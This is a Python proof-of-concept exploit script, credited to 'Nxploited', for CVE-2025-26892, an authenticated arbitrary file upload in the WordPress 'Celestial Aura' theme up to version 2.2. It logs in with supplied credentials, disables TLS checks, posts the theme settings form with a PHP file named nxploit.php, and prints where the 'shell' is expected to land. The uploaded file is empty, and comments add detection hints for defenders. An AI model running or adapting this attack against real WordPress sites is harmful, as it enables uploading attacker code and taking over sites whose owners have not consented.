import argparse
import requests
import time

#By Nxploited ( Khaled_alenazi)

# Proof-of-concept script for CVE-2025-26892 (WordPress "Celestial Aura" theme
# <= 2.2, authenticated arbitrary file upload), as stated in the argparse help.
# Flow: form-login with the supplied credentials -> POST the theme settings
# form with a multipart "file-header" part named nxploit.php -> print the path
# where the script expects the file to land.
# Defender notes (all taken from the requests below): the request of interest
# is a multipart POST to /wp-admin/admin.php?page=CA-settings whose
# "file-header" part carries a .php filename; the artifact the script expects
# afterwards is wp-content/uploads/nxploit.php. Both are reasonable things to
# alert on or block while the affected theme version is in use.

parser = argparse.ArgumentParser(
    description="CVE-2025-26892 | WordPress Celestial Aura Theme <= 2.2 Arbitrary File Upload (Authenticated) - by Khaled Alenazi (Nxploited)"
)
# Base site URL; the paths below are appended with a leading "/", so a trailing
# slash on --url would produce "//wp-login.php".
parser.add_argument("--url", "-u", required=True)
parser.add_argument("--username", "-un", required=True)
parser.add_argument("--password", "-p", required=True)
args = parser.parse_args()

session = requests.Session()
# TLS certificate validation is disabled for every request on this session;
# the following call silences the urllib3 warning that would otherwise print.
session.verify = False
requests.packages.urllib3.disable_warnings()

# Static desktop User-Agent reused on both requests.
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)"}

# --- Step 1: WordPress form login ------------------------------------------
login_url = args.url + "/wp-login.php"
login_data = {
    "log": args.username,
    "pwd": args.password,
    "rememberme": "forever",
    "wp-submit": "Log In"
}
print("\n==============================")
print("[*] Logging in to WordPress...")
print("==============================")
response = session.post(login_url, data=login_data, headers=headers)
# Success is judged solely by a cookie whose name contains
# "wordpress_logged_in" being present in the session jar; the login
# response's status code and body are not inspected.
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
    print("[+] Login successful!")
else:
    print("[-] Login failed.")
    exit()

time.sleep(3)  # fixed pause before the second request; no reason is given in the original

# --- Step 2: theme settings POST carrying a file part ----------------------
upload_url = args.url + "/wp-admin/admin.php?page=CA-settings"
# Ordinary theme settings fields; "action": "CA_save" selects the save handler.
exploit_data = {
    "CA_bgcolor": "97C7F7",
    "CA_blogtitle": "yes",
    "CA_hdrimage": "yes",
    "CA_hdrimageheight": "125",
    "CA_hdrimagepath": "",
    "CA_navbar": "pages",
    "CA_search": "yes",
    "CA_rssicon": "yes",
    "CA_postauthor": "yes",
    "CA_postdate": "yes",
    "CA_postcategory": "yes",
    "CA_posttags": "yes",
    "CA_footertext": "©2025 Nxploit ( Ethical hacking )",
    "CA_save": "Save changes",
    "action": "CA_save"
}
# Multipart part: field name "file-header", filename "nxploit.php", an empty
# body, and a declared MIME type of application/x-php.
exploit_files = {
    "file-header": (
        "nxploit.php",
        "",
        "application/x-php"
    )
}
print("\n==============================")
print("[*] Uploading shell...")
print("==============================")
response = session.post(upload_url, headers=headers, files=exploit_files, data=exploit_data)
# NOTE(review): HTTP 200 from the settings page is the only success criterion;
# the script never requests the printed "Shell Location" to confirm that the
# file was actually written there, so a 200 here does not prove the upload
# took effect.
if response.status_code == 200:
    print("[+] Exploit sent successfully.")
    print("\n==============================")
    print("[+] Form Fields Sent:")
    print("==============================")
    for key in exploit_data:
        print(f" - {key}: {exploit_data[key]}")
    print("\n==============================")
    print("[+] Shell Location:")
    print("==============================")
    # Path is assumed, not observed: it is built from --url and the fixed filename.
    print(f"{args.url}/wp-content/uploads/nxploit.php")
    print("\n==============================")
    print("Exploit By: Khaled_alenazi (Nxploited)")
    print("==============================")
else:
    print("[-] Exploit failed. HTTP", response.status_code)